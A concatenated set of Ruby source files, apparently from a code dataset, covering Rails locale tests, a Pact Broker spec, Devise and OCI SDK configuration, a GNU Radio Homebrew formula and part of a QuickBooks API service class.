I18n.locale = 'de-DE'
section = Section.first
section.title = 'baz (de)'
assert section.save
assert_equal 'baz (de)', Section.first.title
I18n.locale = :'en-US'
assert_equal 'foo (en)', Section.first.title
end
test "saves an English section and loads test correctly" do
assert_nil Section.first
section = Section.create :title => 'foo', :content => 'bar'
assert section.save
section = Section.first
assert_equal 'foo', section.title
assert_equal 'bar', section.content
end
test "updates an attribute" do
section = Section.create :title => 'foo', :content => 'bar'
section.update_attribute :title, 'baz'
section = Section.first
assert_equal 'baz', Section.first.title
end
test "updates an attribute with fallback" do
I18n.fallbacks.map :de => [ :'en-US' ]
section = Section.create :title => 'foo', :content => 'bar'
section.update_attribute :title, 'baz'
assert_equal 'baz', section.title
I18n.locale = :de
assert_equal 'baz', section.title
I18n.locale = :'en-US'
section = Section.first
assert_equal 'baz', section.title
I18n.locale = :de
assert_equal 'baz', section.title
assert_equal 'baz', Section.first.title
end
test "validates presence of :content" do
section = Section.new
assert !section.save
section = Section.new :content => 'foo'
assert section.save
end
test "returns the value for the correct locale, after locale switching" do
section = Section.create :title => 'foo', :content => 'bar'
I18n.locale = 'de-DE'
section.title = 'bar'
section.save
I18n.locale = 'en-US'
section = Section.first
assert_equal 'foo', section.title
I18n.locale = 'de-DE'
assert_equal 'bar', section.title
end
test "returns the value for the correct locale, after locale switching, without saving" do
section = Section.create :title => 'foo'
I18n.locale = 'de-DE'
section.title = 'bar'
I18n.locale = 'en-US'
assert_equal 'foo', section.title
I18n.locale = 'de-DE'
assert_equal 'bar', section.title
end
test "saves all locales, even after locale switching" do
section = Section.new :content => 'foo'
I18n.locale = 'de-DE'
section.content = 'bar'
I18n.locale = 'he-IL'
section.content = 'baz'
assert section.save
I18n.locale = 'en-US'
section = Section.first
assert_equal 'foo', section.content
I18n.locale = 'de-DE'
assert_equal 'bar', section.content
I18n.locale = 'he-IL'
assert_equal 'baz', section.content
end
test "resolves a simple fallback" do
I18n.locale = 'de-DE'
section = Section.create :title => 'foo', :content => 'bar'
I18n.locale = 'de'
section.title = 'baz'
section.content = 'bar'
section.save
I18n.locale = 'de-DE'
assert_equal 'foo', section.title
assert_equal 'bar', section.content
end
test "resolves a simple fallback without reloading" do
I18n.locale = 'de-DE'
section = Section.new :title => 'foo'
I18n.locale = 'de'
section.title = 'baz'
section.content = 'bar'
I18n.locale = 'de-DE'
assert_equal 'foo', section.title
assert_equal 'bar', section.content
end
test "resolves a complex fallback without reloading" do
I18n.fallbacks.map 'de' => %w(en he)
I18n.locale = 'de'
section = Section.new
I18n.locale = 'en'
section.title = 'foo'
I18n.locale = 'he'
section.title = 'baz'
section.content = 'bar'
I18n.locale = 'de'
assert_equal 'foo', section.title
assert_equal 'bar', section.content
end
test "returns nil if no translations are found" do
section = Section.new :title => 'foo'
assert_equal 'foo', section.title
assert_nil section.content
end
test "returns nil if no translations are found; reloaded" do
section = Section.create :content => 'foo'
section = Section.first
assert_equal 'foo', section.content
assert_nil section.title
end
test "works with simple dynamic finders" do
foo = Section.create :title => 'foo', :content => 'bar'
Section.create :title => 'bar'
section = Section.find_by_title('foo')
assert_equal foo, section
end
end
| 29.375566 | 100 | 0.657116 |
d5741fd4dc358b5ca3a9d2edb96a9992cc1d8c16 | 1,432 | require "pact_broker/pacticipants/generate_display_name"
module PactBroker
  module Pacticipants
    describe GenerateDisplayName do
      describe ".call" do
        # A local variable is used instead of a TEST_CASES constant on
        # purpose: a constant assigned inside a `describe` block is attached
        # to the lexically enclosing module (PactBroker::Pacticipants), so it
        # leaks out of this spec file and can collide with other specs or
        # emit "already initialized constant" warnings on reload.
        test_cases = {
          "foo" => "Foo",
          "MyService" => "My Service",
          "my-service" => "My Service",
          "my_service" => "My Service",
          "my service" => "My Service",
          "ABCService" => "ABC Service",
          "A4Service" => "A4 Service",
          "SNSPactEventConsumer" => "SNS Pact Event Consumer",
          "AWSSummiteerWeb" => "AWS Summiteer Web",
          "Beer-Consumer" => "Beer Consumer",
          "foo.pretend-consumer" => "Foo Pretend Consumer",
          "Client-XX" => "Client XX",
          "providerJSWorkshop" => "Provider JS Workshop",
          "e2e Provider Example" => "E2e Provider Example",
          "MP - Our Provider" => "MP - Our Provider",
          "PoC - Pact-broker-consumer" => "PoC - Pact Broker Consumer",
          "QB-DATABASE Service" => "QB DATABASE Service",
          "Support Species App (Provider)" => "Support Species App (Provider)",
          9 => "9",
          "" => "",
          nil => nil
        }.freeze

        # One example per input/expected pair.
        test_cases.each do |name, expected_display_name|
          it "converts #{name.inspect} to #{expected_display_name.inspect}" do
            expect(GenerateDisplayName.call(name)).to eq expected_display_name
          end
        end
      end
    end
  end
end
| 35.8 | 79 | 0.560754 |
4a87f08453b5b20076944bcd463c3895bece3402 | 13,642 | # Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
# Devise configuration. Only the options this application actually sets are
# listed; every other Devise option keeps the gem's default. The statements
# below are executed in the same order as the generated initializer.
Devise.setup do |config|
  # Sender address used by Devise::Mailer for confirmation / password-reset
  # / unlock emails.
  config.mailer_sender = '[email protected]'

  # Persist Devise models through ActiveRecord.
  require 'devise/orm/active_record'

  # Treat the email as case-insensitive, and strip leading/trailing
  # whitespace, both when creating/updating a user and when authenticating.
  config.case_insensitive_keys = [:email]
  config.strip_whitespace_keys = [:email]

  # Do not keep users authenticated via HTTP Basic auth in the session.
  config.skip_session_storage = [:http_auth]

  # bcrypt cost factor. A single stretch in the test environment keeps the
  # suite fast; 11 elsewhere (do not go below 10 in production).
  config.stretches = Rails.env.test? ? 1 : 11

  # Email address changes are staged in unconfirmed_email and only applied
  # once the new address is confirmed.
  config.reconfirmable = true

  # Signing out invalidates every remember-me token for the user.
  config.expire_all_remember_me_on_sign_out = true

  # Accepted password length range.
  config.password_length = 6..128

  # Loose format check only (exactly one '@', no surrounding whitespace);
  # this is user feedback, not a proof of deliverability.
  config.email_regexp = /\A[^@\s]+@[^@\s]+\z/

  # Password-reset tokens stay valid for six hours.
  config.reset_password_within = 6.hours

  # Sign-out is only accepted as an HTTP DELETE request.
  config.sign_out_via = :delete
end
| 49.071942 | 154 | 0.751356 |
7a798346539467d00366624c609cd41e4aad2451 | 13,185 | # Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
  # The request body used to create a Ping monitor.
  #
  # Auto-generated OCI SDK model: attributes mirror the JSON wire format
  # (camelCase keys) while exposing ruby-style snake_case accessors.
  class Healthchecks::Models::CreatePingMonitorDetails
    # Allowed values for {#protocol}; any other value raises in {#protocol=}.
    PROTOCOL_ENUM = [
      PROTOCOL_ICMP = 'ICMP'.freeze,
      PROTOCOL_TCP = 'TCP'.freeze
    ].freeze

    # **[Required]** The OCID of the compartment.
    # @return [String]
    attr_accessor :compartment_id

    # **[Required]** A list of targets (hostnames or IP addresses) of the probe.
    # @return [Array<String>]
    attr_accessor :targets

    # A list of names of vantage points from which to execute the probe.
    # @return [Array<String>]
    attr_accessor :vantage_point_names

    # The port on which to probe endpoints. If unspecified, probes will use the
    # default port of their protocol.
    #
    # @return [Integer]
    attr_accessor :port

    # The probe timeout in seconds. Valid values: 10, 20, 30, and 60.
    # The probe timeout must be less than or equal to `intervalInSeconds` for monitors.
    #
    # @return [Integer]
    attr_accessor :timeout_in_seconds

    # This attribute is required. Reader only: writes go through {#protocol=}
    # so the enum check always runs.
    # @return [String]
    attr_reader :protocol

    # **[Required]** A user-friendly and mutable name suitable for display in a user interface.
    # @return [String]
    attr_accessor :display_name

    # **[Required]** The monitor interval in seconds. Valid values: 10, 30, and 60.
    #
    # @return [Integer]
    attr_accessor :interval_in_seconds

    # Enables or disables the monitor. Set to 'true' to launch monitoring.
    # Defaults to true when not supplied to {#initialize}.
    #
    # @return [BOOLEAN]
    attr_accessor :is_enabled

    # Free-form tags for this resource. Each tag is a simple key-value pair with no
    # predefined name, type, or namespace. For more information,
    # see [Resource Tags](https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
    # Example: `{\"Department\": \"Finance\"}`
    #
    # @return [Hash<String, String>]
    attr_accessor :freeform_tags

    # Defined tags for this resource. Each key is predefined and scoped to a namespace.
    # For more information, see [Resource Tags](https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
    # Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
    #
    # @return [Hash<String, Hash<String, Object>>]
    attr_accessor :defined_tags

    # Attribute mapping from ruby-style variable name to JSON key.
    def self.attribute_map
      {
        # rubocop:disable Style/SymbolLiteral
        'compartment_id': :'compartmentId',
        'targets': :'targets',
        'vantage_point_names': :'vantagePointNames',
        'port': :'port',
        'timeout_in_seconds': :'timeoutInSeconds',
        'protocol': :'protocol',
        'display_name': :'displayName',
        'interval_in_seconds': :'intervalInSeconds',
        'is_enabled': :'isEnabled',
        'freeform_tags': :'freeformTags',
        'defined_tags': :'definedTags'
        # rubocop:enable Style/SymbolLiteral
      }
    end

    # Attribute type mapping (ruby attribute -> declared swagger type string),
    # consumed by {#build_from_hash} to coerce incoming values.
    def self.swagger_types
      {
        # rubocop:disable Style/SymbolLiteral
        'compartment_id': :'String',
        'targets': :'Array<String>',
        'vantage_point_names': :'Array<String>',
        'port': :'Integer',
        'timeout_in_seconds': :'Integer',
        'protocol': :'String',
        'display_name': :'String',
        'interval_in_seconds': :'Integer',
        'is_enabled': :'BOOLEAN',
        'freeform_tags': :'Hash<String, String>',
        'defined_tags': :'Hash<String, Hash<String, Object>>'
        # rubocop:enable Style/SymbolLiteral
      }
    end

    # rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
    # rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral


    # Initializes the object.
    #
    # Each attribute accepts either its camelCase JSON key or its snake_case
    # ruby key, but never both at once (that raises, since it is ambiguous).
    #
    # @param [Hash] attributes Model attributes in the form of hash
    # @option attributes [String] :compartment_id The value to assign to the {#compartment_id} property
    # @option attributes [Array<String>] :targets The value to assign to the {#targets} property
    # @option attributes [Array<String>] :vantage_point_names The value to assign to the {#vantage_point_names} property
    # @option attributes [Integer] :port The value to assign to the {#port} property
    # @option attributes [Integer] :timeout_in_seconds The value to assign to the {#timeout_in_seconds} property
    # @option attributes [String] :protocol The value to assign to the {#protocol} property
    # @option attributes [String] :display_name The value to assign to the {#display_name} property
    # @option attributes [Integer] :interval_in_seconds The value to assign to the {#interval_in_seconds} property
    # @option attributes [BOOLEAN] :is_enabled The value to assign to the {#is_enabled} property
    # @option attributes [Hash<String, String>] :freeform_tags The value to assign to the {#freeform_tags} property
    # @option attributes [Hash<String, Hash<String, Object>>] :defined_tags The value to assign to the {#defined_tags} property
    def initialize(attributes = {})
      return unless attributes.is_a?(Hash)

      # convert string to symbol for hash key
      attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }

      self.compartment_id = attributes[:'compartmentId'] if attributes[:'compartmentId']

      raise 'You cannot provide both :compartmentId and :compartment_id' if attributes.key?(:'compartmentId') && attributes.key?(:'compartment_id')

      self.compartment_id = attributes[:'compartment_id'] if attributes[:'compartment_id']

      self.targets = attributes[:'targets'] if attributes[:'targets']

      self.vantage_point_names = attributes[:'vantagePointNames'] if attributes[:'vantagePointNames']

      raise 'You cannot provide both :vantagePointNames and :vantage_point_names' if attributes.key?(:'vantagePointNames') && attributes.key?(:'vantage_point_names')

      self.vantage_point_names = attributes[:'vantage_point_names'] if attributes[:'vantage_point_names']

      self.port = attributes[:'port'] if attributes[:'port']

      self.timeout_in_seconds = attributes[:'timeoutInSeconds'] if attributes[:'timeoutInSeconds']

      raise 'You cannot provide both :timeoutInSeconds and :timeout_in_seconds' if attributes.key?(:'timeoutInSeconds') && attributes.key?(:'timeout_in_seconds')

      self.timeout_in_seconds = attributes[:'timeout_in_seconds'] if attributes[:'timeout_in_seconds']

      self.protocol = attributes[:'protocol'] if attributes[:'protocol']

      self.display_name = attributes[:'displayName'] if attributes[:'displayName']

      raise 'You cannot provide both :displayName and :display_name' if attributes.key?(:'displayName') && attributes.key?(:'display_name')

      self.display_name = attributes[:'display_name'] if attributes[:'display_name']

      self.interval_in_seconds = attributes[:'intervalInSeconds'] if attributes[:'intervalInSeconds']

      raise 'You cannot provide both :intervalInSeconds and :interval_in_seconds' if attributes.key?(:'intervalInSeconds') && attributes.key?(:'interval_in_seconds')

      self.interval_in_seconds = attributes[:'interval_in_seconds'] if attributes[:'interval_in_seconds']

      # is_enabled defaults to true when neither key is supplied; an explicit
      # false must be preserved, hence the .nil? checks instead of truthiness.
      self.is_enabled = attributes[:'isEnabled'] unless attributes[:'isEnabled'].nil?
      self.is_enabled = true if is_enabled.nil? && !attributes.key?(:'isEnabled') # rubocop:disable Style/StringLiterals

      raise 'You cannot provide both :isEnabled and :is_enabled' if attributes.key?(:'isEnabled') && attributes.key?(:'is_enabled')

      self.is_enabled = attributes[:'is_enabled'] unless attributes[:'is_enabled'].nil?
      self.is_enabled = true if is_enabled.nil? && !attributes.key?(:'isEnabled') && !attributes.key?(:'is_enabled') # rubocop:disable Style/StringLiterals

      self.freeform_tags = attributes[:'freeformTags'] if attributes[:'freeformTags']

      raise 'You cannot provide both :freeformTags and :freeform_tags' if attributes.key?(:'freeformTags') && attributes.key?(:'freeform_tags')

      self.freeform_tags = attributes[:'freeform_tags'] if attributes[:'freeform_tags']

      self.defined_tags = attributes[:'definedTags'] if attributes[:'definedTags']

      raise 'You cannot provide both :definedTags and :defined_tags' if attributes.key?(:'definedTags') && attributes.key?(:'defined_tags')

      self.defined_tags = attributes[:'defined_tags'] if attributes[:'defined_tags']
    end
    # rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
    # rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral

    # Custom attribute writer method checking allowed values (enum).
    # nil is accepted (attribute not yet set); any non-nil value must be a
    # member of PROTOCOL_ENUM.
    # @param [Object] protocol Object to be assigned
    def protocol=(protocol)
      raise "Invalid value for 'protocol': this must be one of the values in PROTOCOL_ENUM." if protocol && !PROTOCOL_ENUM.include?(protocol)

      @protocol = protocol
    end

    # rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines


    # Checks equality by comparing each attribute.
    # @param [Object] other the other object to be compared
    def ==(other)
      return true if equal?(other)

      self.class == other.class &&
        compartment_id == other.compartment_id &&
        targets == other.targets &&
        vantage_point_names == other.vantage_point_names &&
        port == other.port &&
        timeout_in_seconds == other.timeout_in_seconds &&
        protocol == other.protocol &&
        display_name == other.display_name &&
        interval_in_seconds == other.interval_in_seconds &&
        is_enabled == other.is_enabled &&
        freeform_tags == other.freeform_tags &&
        defined_tags == other.defined_tags
    end
    # rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines

    # @see the `==` method
    # @param [Object] other the other object to be compared
    def eql?(other)
      self == other
    end

    # rubocop:disable Metrics/AbcSize, Layout/EmptyLines


    # Calculates hash code according to all attributes, keeping it consistent
    # with `==`/`eql?` so instances can be used as Hash keys.
    # @return [Fixnum] Hash code
    def hash
      [compartment_id, targets, vantage_point_names, port, timeout_in_seconds, protocol, display_name, interval_in_seconds, is_enabled, freeform_tags, defined_tags].hash
    end
    # rubocop:enable Metrics/AbcSize, Layout/EmptyLines

    # rubocop:disable Metrics/AbcSize, Layout/EmptyLines


    # Builds the object from hash of JSON-keyed attributes, coercing each
    # value to its declared swagger type via OCI::Internal::Util.
    # @param [Hash] attributes Model attributes in the form of hash
    # @return [Object] Returns the model itself
    def build_from_hash(attributes)
      return nil unless attributes.is_a?(Hash)

      self.class.swagger_types.each_pair do |key, type|
        if type =~ /^Array<(.*)>/i
          # check to ensure the input is an array given that the attribute
          # is documented as an array but the input is not
          if attributes[self.class.attribute_map[key]].is_a?(Array)
            public_method("#{key}=").call(
              attributes[self.class.attribute_map[key]]
                .map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
            )
          end
        elsif !attributes[self.class.attribute_map[key]].nil?
          public_method("#{key}=").call(
            OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
          )
        end
        # or else data not found in attributes(hash), not an issue as the data can be optional
      end

      self
    end
    # rubocop:enable Metrics/AbcSize, Layout/EmptyLines

    # Returns the string representation of the object
    # @return [String] String presentation of the object
    def to_s
      to_hash.to_s
    end

    # Returns the object in the form of hash, keyed by the JSON wire names.
    # Attributes that were never assigned are omitted entirely, while an
    # explicit nil assignment is preserved (instance_variable_defined? check).
    # @return [Hash] Returns the object in the form of hash
    def to_hash
      hash = {}
      self.class.attribute_map.each_pair do |attr, param|
        value = public_method(attr).call
        next if value.nil? && !instance_variable_defined?("@#{attr}")

        hash[param] = _to_hash(value)
      end
      hash
    end

    private

    # Outputs non-array value in the form of hash
    # For object, use to_hash. Otherwise, just return the value
    # @param [Object] value Any valid value
    # @return [Hash] Returns the value in the form of hash
    def _to_hash(value)
      if value.is_a?(Array)
        value.compact.map { |v| _to_hash(v) }
      elsif value.is_a?(Hash)
        {}.tap do |hash|
          value.each { |k, v| hash[k] = _to_hash(v) }
        end
      elsif value.respond_to? :to_hash
        value.to_hash
      else
        value
      end
    end
  end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 42.395498 | 245 | 0.687979 |
# Append a "Lista de Bancos" entry to the bottom of the admin configuration
# sidebar menu rendered by spree/admin/shared/sub_menu/_configuration.
Deface::Override.new(
  virtual_path:  "spree/admin/shared/sub_menu/_configuration",
  name:          "add_bank_settings",
  insert_bottom: "[data-hook='admin_configurations_sidebar_menu'], #admin_configurations_sidebar_menu[data-hook]",
  text:          "<%= configurations_sidebar_menu_item('Lista de Bancos', admin_banks_path) %>"
)
# Rackup file: boots the Sinatra application defined in app.rb and declares
# it as the Rack endpoint (served by Thin).
require 'rubygems'
require 'thin'
require 'sinatra'

# Load the application class (MyApp) from the sibling app.rb file.
require File.expand_path '../app.rb', __FILE__

# Hand a fresh application instance to Rack.
run MyApp.new
| 14.375 | 46 | 0.747826 |
6a97ed16128f59712232bddc23a41d1da08b266f | 157 | # frozen_string_literal: true
##
# Class: Directory model
#
# Sequel model for a directory tree. MatPath::Plugin mixes materialized-path
# behavior into model instances, and MatPath::Datasets adds the matching
# query helpers to the model's dataset.
# NOTE(review): the plugin is loaded before the dataset module — MatPath's
# dataset helpers presumably rely on state the plugin sets up; confirm
# before reordering.
class Directory < Sequel::Model
  plugin MatPath::Plugin
  dataset_module MatPath::Datasets
end
| 15.7 | 34 | 0.764331 |
module BlockStack
  module Validations
    # Validation that fails for nil values and for anything that answers
    # true to #empty? (empty strings, arrays, hashes, ...). Objects that do
    # not respond to #empty? pass as long as they are non-nil.
    class NotEmpty < Validation
      protected

      # Returns true when +value+ is present: non-nil and, when it supports
      # #empty?, not empty. +expression+ is accepted for interface parity
      # with other validations but is not consulted here.
      def validate(value, expression)
        return false if value.nil?

        !(value.respond_to?(:empty?) && value.empty?)
      end

      # Failure message; " not" is dropped when the validation is inverted.
      def default_message
        "#{clean_attribute_name} must#{inverse? ? nil : ' not'} be empty."
      end
    end
  end
end
| 18.666667 | 74 | 0.613095 |
# Homebrew formula for GNU Radio 3.7: builds the signal-processing runtime,
# its Python 2 bindings, and a set of vendored pure-Python dependencies.
class Gnuradio < Formula
  desc "SDK providing the signal processing runtime and processing blocks"
  homepage "https://gnuradio.org/"
  url "https://gnuradio.org/releases/gnuradio/gnuradio-3.7.13.4.tar.gz"
  sha256 "c536c268b1e9c24f1206bbc881a5819ac46e662f4e8beaded6f3f441d3502f0d"
  revision 4
  head "https://github.com/gnuradio/gnuradio.git"

  bottle do
    sha256 "60fc854609cec6c8d9ccbe8a1d6fd5636748318376fe8effe3998b9c3d0a0fb1" => :mojave
    sha256 "33a166a3abd211d7e0c456a3b991f8b24759e517f55a192941a0e945adfd7905" => :high_sierra
    sha256 "c9b67dc92407723541c408a4d2fb614b852f06b55511dd9d0a9036e8318a7638" => :sierra
  end

  depends_on "cmake" => :build
  depends_on "doxygen" => :build
  depends_on "pkg-config" => :build
  depends_on "sphinx-doc" => :build
  depends_on "swig" => :build
  depends_on "boost"
  depends_on "fftw"
  depends_on "gsl"
  depends_on "numpy"
  depends_on "portaudio"
  depends_on "python@2"
  depends_on "uhd"
  depends_on "zeromq"

  # Python resources vendored into libexec so the formula does not touch the
  # system/site Python. Markdown is a dependency of Cheetah.
  # cheetah starts here
  resource "Markdown" do
    url "https://files.pythonhosted.org/packages/b3/73/fc5c850f44af5889192dff783b7b0d8f3fe8d30b65c8e3f78f8f0265fecf/Markdown-2.6.11.tar.gz"
    sha256 "a856869c7ff079ad84a3e19cd87a64998350c2b94e9e08e44270faef33400f81"
  end

  resource "Cheetah" do
    url "https://files.pythonhosted.org/packages/cd/b0/c2d700252fc251e91c08639ff41a8a5203b627f4e0a2ae18a6b662ab32ea/Cheetah-2.4.4.tar.gz"
    sha256 "be308229f0c1e5e5af4f27d7ee06d90bb19e6af3059794e5fd536a6f29a9b550"
  end
  # cheetah ends here

  resource "lxml" do
    url "https://files.pythonhosted.org/packages/54/a6/43be8cf1cc23e3fa208cab04ba2f9c3b7af0233aab32af6b5089122b44cd/lxml-4.2.3.tar.gz"
    sha256 "622f7e40faef13d232fb52003661f2764ce6cdef3edb0a59af7c1559e4cc36d1"
  end

  resource "MarkupSafe" do
    url "https://files.pythonhosted.org/packages/4d/de/32d741db316d8fdb7680822dd37001ef7a448255de9699ab4bfcbdf4172b/MarkupSafe-1.0.tar.gz"
    sha256 "a6be69091dac236ea9c6bc7d012beab42010fa914c459791d627dad4910eb665"
  end

  resource "Mako" do
    url "https://files.pythonhosted.org/packages/eb/f3/67579bb486517c0d49547f9697e36582cd19dafb5df9e687ed8e22de57fa/Mako-1.0.7.tar.gz"
    sha256 "4e02fde57bd4abb5ec400181e4c314f56ac3e49ba4fb8b0d50bba18cb27d25ae"
  end

  resource "six" do
    url "https://files.pythonhosted.org/packages/16/d8/bc6316cf98419719bd59c91742194c111b6f2e85abac88e496adefaf7afe/six-1.11.0.tar.gz"
    sha256 "70e8a77beed4562e7f14fe23a786b54f6296e34344c23bc42f07b15018ff98e9"
  end

  # Single-header C++ binding for ZeroMQ, staged straight into include/.
  resource "cppzmq" do
    url "https://raw.githubusercontent.com/zeromq/cppzmq/46fc0572c5e9f09a32a23d6f22fd79b841f77e00/zmq.hpp"
    sha256 "964031c0944f913933f55ad1610938105a6657a69d1ac5a6dd50e16a679104d5"
  end

  def install
    # Use the system Python 2.7 and let Cheetah install without setuptools.
    ENV.prepend_path "PATH", "/System/Library/Frameworks/Python.framework/Versions/2.7/bin"
    ENV["CHEETAH_INSTALL_WITHOUT_SETUPTOOLS"] = "1"
    ENV["XML_CATALOG_FILES"] = etc/"xml/catalog"

    # Vendor the pure-Python dependencies under libexec (order matters:
    # Markdown must precede Cheetah).
    ENV.prepend_create_path "PYTHONPATH", libexec/"vendor/lib/python2.7/site-packages"
    %w[Markdown Cheetah MarkupSafe Mako six].each do |r|
      resource(r).stage do
        system "python", *Language::Python.setup_install_args(libexec/"vendor")
      end
    end

    begin
      # Fix "ld: file not found: /usr/lib/system/libsystem_darwin.dylib" for lxml
      ENV["SDKROOT"] = MacOS.sdk_path if MacOS.version == :sierra
      resource("lxml").stage do
        system "python", *Language::Python.setup_install_args(libexec/"vendor")
      end
    ensure
      # Always clear the workaround so later build steps are unaffected.
      ENV.delete("SDKROOT")
    end

    resource("cppzmq").stage include.to_s

    # Disable all components by default, then explicitly enable the set below.
    args = std_cmake_args + %W[
      -DGR_PKG_CONF_DIR=#{etc}/gnuradio/conf.d
      -DGR_PREFSDIR=#{etc}/gnuradio/conf.d
      -DENABLE_DEFAULT=OFF
    ]

    enabled = %w[GR_ANALOG GR_FFT VOLK GR_FILTER GNURADIO_RUNTIME
                 GR_BLOCKS GR_PAGER GR_NOAA GR_CHANNELS GR_AUDIO
                 GR_FCD GR_VOCODER GR_FEC GR_DIGITAL GR_DTV GR_ATSC
                 GR_TRELLIS GR_ZEROMQ GR_WAVELET GR_UHD DOXYGEN SPHINX
                 PYTHON GR_UTILS]
    enabled.each do |c|
      args << "-DENABLE_#{c}=ON"
    end

    mkdir "build" do
      system "cmake", "..", *args
      system "make"
      system "make", "install"
    end

    # Drop non-executable clutter from bin, then wrap every remaining script
    # so it runs with the vendored PYTHONPATH.
    rm bin.children.reject(&:executable?)
    bin.env_script_all_files(libexec/"bin", :PYTHONPATH => ENV["PYTHONPATH"])
  end

  test do
    assert_match version.to_s, shell_output("#{bin}/gnuradio-config-info -v")

    # Build and run a minimal C++ flowgraph (null source -> head -> null sink).
    (testpath/"test.c++").write <<~EOS
      #include <gnuradio/top_block.h>
      #include <gnuradio/blocks/null_source.h>
      #include <gnuradio/blocks/null_sink.h>
      #include <gnuradio/blocks/head.h>
      #include <gnuradio/gr_complex.h>

      class top_block : public gr::top_block {
      public:
        top_block();
      private:
        gr::blocks::null_source::sptr null_source;
        gr::blocks::null_sink::sptr null_sink;
        gr::blocks::head::sptr head;
      };

      top_block::top_block() : gr::top_block("Top block") {
        long s = sizeof(gr_complex);
        null_source = gr::blocks::null_source::make(s);
        null_sink = gr::blocks::null_sink::make(s);
        head = gr::blocks::head::make(s, 1024);
        connect(null_source, 0, head, 0);
        connect(head, 0, null_sink, 0);
      }

      int main(int argc, char **argv) {
        top_block top;
        top.run();
      }
    EOS
    system ENV.cxx, "-L#{lib}", "-L#{Formula["boost"].opt_lib}",
           "-lgnuradio-blocks", "-lgnuradio-runtime", "-lgnuradio-pmt",
           "-lboost_system", testpath/"test.c++", "-o", testpath/"test"
    system "./test"

    # Same flowgraph through the Python bindings.
    (testpath/"test.py").write <<~EOS
      from gnuradio import blocks
      from gnuradio import gr

      class top_block(gr.top_block):
          def __init__(self):
              gr.top_block.__init__(self, "Top Block")
              self.samp_rate = 32000
              s = gr.sizeof_gr_complex
              self.blocks_null_source_0 = blocks.null_source(s)
              self.blocks_null_sink_0 = blocks.null_sink(s)
              self.blocks_head_0 = blocks.head(s, 1024)
              self.connect((self.blocks_head_0, 0),
                           (self.blocks_null_sink_0, 0))
              self.connect((self.blocks_null_source_0, 0),
                           (self.blocks_head_0, 0))

      def main(top_block_cls=top_block, options=None):
          tb = top_block_cls()
          tb.start()
          tb.wait()

      main()
    EOS
    system "python2.7", testpath/"test.py"

    # Verify the gr_modtool scaffolding utility works end to end.
    cd testpath do
      system "#{bin}/gr_modtool", "newmod", "test"
      cd "gr-test" do
        system "#{bin}/gr_modtool", "add", "-t", "general", "test_ff", "-l",
               "python", "-y", "--argument-list=''", "--add-python-qa",
               "--copyright=brew"
      end
    end
  end
end
| 35.296875 | 139 | 0.678619 |
1c6baff0509eb86af0c54218dea09677ebceb4d2 | 10,514 | module Quickbooks
module Service
class BaseService
include Quickbooks::Util::Logging
include ServiceCrud

# QuickBooks Online company (realm) identifier used to build resource URLs.
attr_accessor :company_id
# OAuth access-token object used to sign every HTTP request.
attr_accessor :oauth
attr_reader :base_uri
# Raw body / parsed Nokogiri document of the most recent HTTP response.
attr_reader :last_response_body
attr_reader :last_response_xml

# Default XML namespace attribute for Intuit v3 API payloads.
XML_NS = %{xmlns="http://schema.intuit.com/finance/v3"}
HTTP_CONTENT_TYPE = 'application/xml'
HTTP_ACCEPT = 'application/xml'
HTTP_ACCEPT_ENCODING = 'gzip, deflate'
BASE_DOMAIN = 'quickbooks.api.intuit.com'
SANDBOX_DOMAIN = 'sandbox-quickbooks.api.intuit.com'
# Builds a service pointed at the production or sandbox API host
# (chosen by Quickbooks.sandbox_mode) and applies the given attributes
# through their writer methods.
def initialize(attributes = {})
  domain = Quickbooks.sandbox_mode ? SANDBOX_DOMAIN : BASE_DOMAIN
  @base_uri = "https://#{domain}/v3/company"
  attributes.each {|key, value| public_send("#{key}=", value) }
end

# Stores the OAuth token used to sign requests.
def access_token=(token)
  @oauth = token
end

def company_id=(company_id)
  @company_id = company_id
end

# realm & company are synonymous
def realm_id=(company_id)
  @company_id = company_id
end

# URL for a named resource under the company base, e.g. ".../customer".
def url_for_resource(resource)
  "#{url_for_base}/#{resource}"
end

# Company-scoped API root; raises MissingRealmError until a
# realm/company id has been assigned.
def url_for_base
  raise MissingRealmError.new unless @company_id
  "#{@base_uri}/#{@company_id}"
end
# Default SELECT statement for this service's model, derived from the
# unqualified class name (e.g. "SELECT * FROM Customer").
def default_model_query
  entity = self.class.name.split("::").last
  "SELECT * FROM #{entity}"
end
# Builds the /query endpoint URL for the given QBO query string,
# appending STARTPOSITION/MAXRESULTS paging clauses and URL-encoding
# the whole statement.
def url_for_query(query = nil, start_position = 1, max_results = 20)
  query ||= default_model_query
  query = "#{query} STARTPOSITION #{start_position} MAXRESULTS #{max_results}"

  "#{url_for_base}/query?query=#{URI.encode_www_form_component(query)}"
end
private
# Parses raw response XML and memoizes the document in @last_response_xml.
def parse_xml(xml)
  @last_response_xml = Nokogiri::XML(xml)
end
# Prepends the standard XML declaration to a stripped XML fragment.
def valid_xml_document(xml)
  declaration = %Q{<?xml version="1.0" encoding="utf-8"?>}
  "#{declaration}\n#{xml.strip}"
end
# A single object response is the same as a collection response except
# it just has a single main element
#
# Fetches one entity of +model+ from +url+ and returns it, or nil when
# the response did not parse into a collection.
def fetch_object(model, url, params = {})
  raise ArgumentError, "missing model to instantiate" if model.nil?
  response = do_http_get(url, params)
